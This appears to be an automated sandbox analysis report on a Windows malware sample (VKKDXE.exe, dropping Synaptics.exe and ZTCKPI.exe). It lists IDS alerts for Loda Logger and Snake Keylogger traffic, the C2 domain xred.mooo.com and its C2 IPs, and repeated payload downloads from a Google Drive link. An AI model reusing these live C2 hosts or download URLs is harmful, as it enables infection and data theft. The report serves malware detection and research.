Source: unknown	HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.7:49829 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.7:49864 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.7:49871 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.7:49879 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.7:49908 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.7:49909 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.7:49918 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.7:49919 version: TLS 1.2

Source: VKKDXE.exe, 00000000.00000000.1260396228.0000000000401000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: [autorun]
Source: VKKDXE.exe, 00000000.00000000.1260396228.0000000000401000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: [autorun]
Source: VKKDXE.exe, 00000000.00000000.1260396228.0000000000401000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: autorun.inf
Source: VKKDXE.exe	Binary or memory string: [autorun]
Source: VKKDXE.exe	Binary or memory string: [autorun]
Source: VKKDXE.exe	Binary or memory string: autorun.inf
Source: RCX458E.tmp.0.dr	Binary or memory string: [autorun]
Source: RCX458E.tmp.0.dr	Binary or memory string: [autorun]
Source: RCX458E.tmp.0.dr	Binary or memory string: autorun.inf
Source: Synaptics.exe.0.dr	Binary or memory string: [autorun]
Source: Synaptics.exe.0.dr	Binary or memory string: [autorun]
Source: Synaptics.exe.0.dr	Binary or memory string: autorun.inf

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D5DD92 GetFileAttributesW,FindFirstFileW,FindClose,	3_2_00D5DD92
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D92044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	3_2_00D92044
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D9219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	3_2_00D9219F
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D924A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	3_2_00D924A9
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D86B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	3_2_00D86B3F
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D86E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	3_2_00D86E4A
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D8F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	3_2_00D8F350
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D8FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	3_2_00D8FDD2
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D8FD47 FindFirstFileW,FindClose,	3_2_00D8FD47
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00E12044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	15_2_00E12044
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00E1219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	15_2_00E1219F
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00E124A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	15_2_00E124A9
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00E06B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	15_2_00E06B3F
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00E06E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	15_2_00E06E4A
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00E0F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	15_2_00E0F350
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00E0FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	15_2_00E0FDD2
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00DDDD92 GetFileAttributesW,FindFirstFileW,FindClose,	15_2_00DDDD92
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00E0FD47 FindFirstFileW,FindClose,	15_2_00E0FD47

Source: C:\Users\user\Desktop\VKKDXE.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\VKKDXE.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior

Source: excel.exe

Memory has grown: Private usage: 1MB later: 69MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.7:49737 -> 172.111.138.100:5552
Source: Network traffic	Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.7:49737 -> 172.111.138.100:5552
Source: Network traffic	Suricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.7:49714 -> 69.42.215.252:80
Source: Network traffic	Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.7:49845 -> 172.111.138.100:5552
Source: Network traffic	Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.7:49945 -> 172.111.138.100:5552
Source: Network traffic	Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.7:50009 -> 172.111.138.100:5552
Source: Network traffic	Suricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.7:50069 -> 172.111.138.100:5552
Source: Network traffic	Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.7:50069 -> 172.111.138.100:5552
Source: Network traffic	Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.7:50096 -> 172.111.138.100:5552
Source: Network traffic	Suricata IDS: 2830912 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon Response M2 : 172.111.138.100:5552 -> 192.168.2.7:50096
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49707 -> 172.217.18.110:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49717 -> 172.217.18.110:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49728 -> 172.217.18.110:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49706 -> 172.217.18.110:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49716 -> 172.217.18.110:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49744 -> 172.217.18.110:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49745 -> 172.217.18.110:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49819 -> 172.217.18.110:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49802 -> 172.217.18.110:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49785 -> 172.217.18.110:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49792 -> 172.217.18.110:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49791 -> 172.217.18.110:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49836 -> 172.217.18.110:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49768 -> 172.217.18.110:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49782 -> 172.217.18.110:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49727 -> 172.217.18.110:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49826 -> 172.217.18.110:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49838 -> 172.217.18.110:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49807 -> 172.217.18.110:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49818 -> 172.217.18.110:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49828 -> 172.217.18.110:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49767 -> 172.217.18.110:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: xred.mooo.com

Uses dynamic DNS services

Source: unknown

DNS query: name: freedns.afraid.org

Source: Joe Sandbox View	IP Address: 172.111.138.100 172.111.138.100
Source: Joe Sandbox View	IP Address: 69.42.215.252 69.42.215.252

Source: Joe Sandbox View

ASN Name: VOXILITYGB VOXILITYGB

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe

Code function: 3_2_00D9550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

3_2_00D9550C

Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DPtEZqkWeUMpq5dZB0z1HJs9xQLgpB2_HySjpkRoBbvZMpi-mMn31SqbVh8XR8maKW8QmHkCVbZNJ98RCXduro38NA--lOV-9KBv9Z23AYZm6AUy-8WPIeNJA2H_NIsXy7URfaQa4rbx6IONw1g110GPpwA3kBTKKqjTO3FxmZOJ9WlI2AmnYHqD
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DPtEZqkWeUMpq5dZB0z1HJs9xQLgpB2_HySjpkRoBbvZMpi-mMn31SqbVh8XR8maKW8QmHkCVbZNJ98RCXduro38NA--lOV-9KBv9Z23AYZm6AUy-8WPIeNJA2H_NIsXy7URfaQa4rbx6IONw1g110GPpwA3kBTKKqjTO3FxmZOJ9WlI2AmnYHqD
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DPtEZqkWeUMpq5dZB0z1HJs9xQLgpB2_HySjpkRoBbvZMpi-mMn31SqbVh8XR8maKW8QmHkCVbZNJ98RCXduro38NA--lOV-9KBv9Z23AYZm6AUy-8WPIeNJA2H_NIsXy7URfaQa4rbx6IONw1g110GPpwA3kBTKKqjTO3FxmZOJ9WlI2AmnYHqD
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DPtEZqkWeUMpq5dZB0z1HJs9xQLgpB2_HySjpkRoBbvZMpi-mMn31SqbVh8XR8maKW8QmHkCVbZNJ98RCXduro38NA--lOV-9KBv9Z23AYZm6AUy-8WPIeNJA2H_NIsXy7URfaQa4rbx6IONw1g110GPpwA3kBTKKqjTO3FxmZOJ9WlI2AmnYHqD
